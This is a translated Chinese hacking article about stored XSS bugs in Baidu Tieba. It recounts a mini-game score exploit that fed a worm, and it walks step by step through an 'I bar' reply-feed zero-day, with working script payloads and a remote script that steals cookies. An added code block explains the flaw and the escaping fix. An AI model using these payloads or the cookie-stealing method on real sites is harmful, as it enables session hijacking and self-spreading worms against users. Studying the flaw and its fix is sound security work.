Readers who visit Baidu Tieba often may know that on the night of December 31 last year and on January 1 a total of three 0day cross-site scripting (XSS) vulnerabilities surfaced on Baidu, all rated high-risk. Two were related to the mini-game, and the remaining one was in the member badge displayed in the bar.
Before getting to the 0day in this article, let's look at how those three earlier bugs were discovered and exploited.
First, the two mini-game bugs. On the afternoon of December 31 last year, a friend of mine worked out the mini-game's score submission algorithm and ported it to a VBS script; a Chrome browser extension followed, and with it you could write in whatever score you wanted directly.
Then I noticed that someone had a score of -1. Out of curiosity, I used the public VBS script to submit a string of English letters. To my surprise the submission went through, and the text appeared on my I bar page.
A field that should show a numeric value could display English text, which made me seriously doubt the database skills of Baidu's staff. Next, another friend saw my showing off and immediately tried entering a <script> tag. Yes, the script was executed! Unfortunately this vulnerability was exposed too quickly and was soon repaired by Baidu's staff: non-numeric characters could no longer be submitted. Just when it seemed the problem was gone, the mini-game's show-off feature gave the second bug plenty of preparation time to break out.
In the same place, besides the score display problem, the display of the bar name in front of the score also had a problem.
Probably because this mini-game could be played in both the Mini-Game bar and the Gold Miner bar, Baidu also submitted the bar name when showing off the game. So we tried submitting a name like
</a><script>alert("xxx");</script><a href="xxx">Gold Miner
and yes, an alert box popped up. It was deleted immediately, and full preparations were made.
What happened next everyone knows: on the night of January 1 the 922EE virus broke out. Because they all had the highest score, you could see from the Gold Miner rankings that the infection rate was more than 400 people per second, which is quite scary (see the attachment for the 922EE script virus code).
The other cross-site vulnerability exposed the same night was the member badge bug. Because of insufficient preparation it was leaked by someone else, so we did not use it, but it is the one "everybody" exploited! Since the member badge sits right next to the avatar, almost everyone who saw the method tried it, and for a while Baidu Tieba was popping alert boxes nonstop!
More interesting still, when Baidu released a new Tieba version on January 6, the already-patched member badge bug appeared again, though this time it was fixed very quickly, in about an hour. It seems the earlier patch was only a temporary fix, and the update did not carry that patch over.
That covers the three big vulnerabilities. Also worth mentioning is that before the 4th the voting system had a 0day as well: HTML code written into a voting option was not filtered at all and was written directly into the page code.
Unfortunately, for reasons I don't know, script code could not be executed directly there, but one might use the cross-iframe trick to break out of the IFRAME's limits. (Baidu has since fixed this in Tieba, but at the time this article was submitted, the I bar voting system bug still existed.) Now, on to the vulnerability this article is about. First I must state: please do not use this vulnerability for anything that violates laws and regulations. It is presented for everyone to study the technique. While studying, please keep a low profile, preferably in a bar where you have bar owner (moderator) permissions, so that traces can be easily removed afterwards.
First we need to prepare two accounts: one as the victim account (No. 1) and one as the attacker account (No. 2).
I recommend Chrome here, since it makes debugging the page code easy.
First, the principle. This 0day is in I bar; it seems Baidu was in a hurry to release I bar and did not test it well.
I bar works much like a microblog: it shows the posts and replies of the people you follow, along with the replies you yourself have received.
The problem is in the display of "replies I received". Tieba filters the content of replies on the post page very strictly, but it also shows part of each reply on the I bar page. If you reply with HTML code, nothing shows on the post page and the code is not executed. I bar is different: it writes that piece of text straight into the web page without any processing, and there is the cross-site vulnerability! What we are going to do is study it carefully.
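As an added example (not code from the original article or from Baidu), here is a small JavaScript model of the mismatch described above: the post page strips tags from a reply before showing it, while the feed page takes the same stored text, wraps it in a link, and concatenates it into the HTML unescaped. It also shows the fix, escaping at the point of output in the context the data lands in. The function names, the sample URL and the feed markup are hypothetical; the payload is the one used in this article.

```javascript
// Added example, not code from the original article or from Baidu: a minimal
// model of the "replies to me" feed described above. Function names, the
// sample URL and the markup are hypothetical; the payload is the article's.

// The article's payload: close the link the feed wraps around the reply,
// run script, then reopen a link so the page's own </a> still matches.
const PAYLOAD = '</a><script>alert(document.cookie);</script><a>';

// A stored reply as it would sit in the database: raw text, nothing filtered.
function storeReply(author, text) {
  return { author, text, url: 'https://example.invalid/p/1' }; // constructed sample
}

// Post page: tags are stripped at display time, so the payload renders as
// inert text ("alert(document.cookie);") and nothing executes there.
function renderThreadView(reply) {
  return reply.text.replace(/<[^>]*>/g, '');
}

// Feed page, vulnerable: the same stored text, no processing at all, dropped
// inside a link. The leading </a> closes that link and the rest is live markup.
function renderFeedItemVulnerable(reply) {
  return `<li>${reply.author} replied: <a href="${reply.url}">${reply.text}</a></li>`;
}

// Output encoding for an HTML text or quoted-attribute context.
function escapeHtml(s) {
  return String(s).replace(/[&<>"']/g, (c) => ({
    '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;',
  })[c]);
}

// Feed page, fixed: encode at the point of output, in the context the data
// lands in. The stored text is left alone; every output path escapes for itself,
// so a filter on the post page cannot be bypassed by reading the feed instead.
function renderFeedItemSafe(reply) {
  return `<li>${escapeHtml(reply.author)} replied: ` +
    `<a href="${escapeHtml(reply.url)}">${escapeHtml(reply.text)}</a></li>`;
}

// Demo helper: does the markup contain an actual <script> element?
function hasScriptElement(html) {
  return /<script\b/i.test(html);
}

// Run-through when executed directly with node.
const reply = storeReply('attacker', PAYLOAD);
console.log('post page shows   :', JSON.stringify(renderThreadView(reply)));
console.log('feed (vulnerable) :', hasScriptElement(renderFeedItemVulnerable(reply)));
console.log('feed (fixed)      :', hasScriptElement(renderFeedItemSafe(reply)));
```

The point is the one the article makes: the reply was harmless on the post page only because that page filtered it, and a second view of the same stored text needs its own output encoding. Filtering once on input, or on one output path, does not cover the others.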
First, use account No. 1 to make a post; this just makes preparing the attack easier (using two browsers makes this much more convenient). Then use account No. 2 to reply with something (this is only a test; you can skip it and go straight to the second step). See, a new-reply notification appears under the user column of account No. 1:
Anyone who uses Baidu Tieba often will recognise this prompt.
In the second step, we reply to account No. 1 with carefully crafted script code. For convenience we test with the following code:
<script>alert(document.cookie);</script>
Since I bar wraps the displayed reply in a hyperlink, we had better use </a> first to close that hyperlink:
</a><script>alert(document.cookie);</script><a>
Post the reply, and make sure the final reply contains this code, because I bar only shows the last reply.
At this point the work on account No. 2 is done; now wait for account No. 1 to check the reply! Click "Replies to me" in I bar under account No. 1:
Look, there is the dialog box. Notice that the page has only loaded up to the point after the quotation marks, which is where our code is displayed. Then view the page source:
Sure enough, the content of our reply is written into the web page.
Now we try loading an external script file. I believe readers are already familiar with the following code:
<script src="http://xxx"></script>
Just replace http://xxx with the address of your own script file; for my test I used a script file that records cookies.
Because it is a reply, we again add </a> in front and <a> after it!
After posting, the reply is encoded inside the post itself, but don't worry; account No. 1 still checks the reply!
Go to the "Replies to me" page of account No. 1's I bar. Sure enough, the spot between the quotation marks where the reply is displayed is empty on the page. In Chrome, right-click that spot and select Inspect Element to jump straight to the source at the mouse position:
See, the code is injected!
Then look at the file on our server:
The cookie is recorded, and our code executed correctly!
By now I believe readers understand what is going on. In addition, because of Baidu's defensive measures, posts and replies containing unknown links may be deleted, but I bar still shows the last reply whether or not it was deleted, so this mechanism actually helps hide the attack. Call it being too clever for its own good?
The vulnerabilities recently exposed at Baidu are all high-risk ones. For website developers, especially of sites with this much user interaction, these problems deserve attention: wherever possible, prevent high-risk vulnerabilities anywhere on the site from being used by attackers to plant drive-by malware ("hang horses") or to turn the site into a breeding ground for spreading viruses.
Baidu I bar 0day Cross-site vulnerability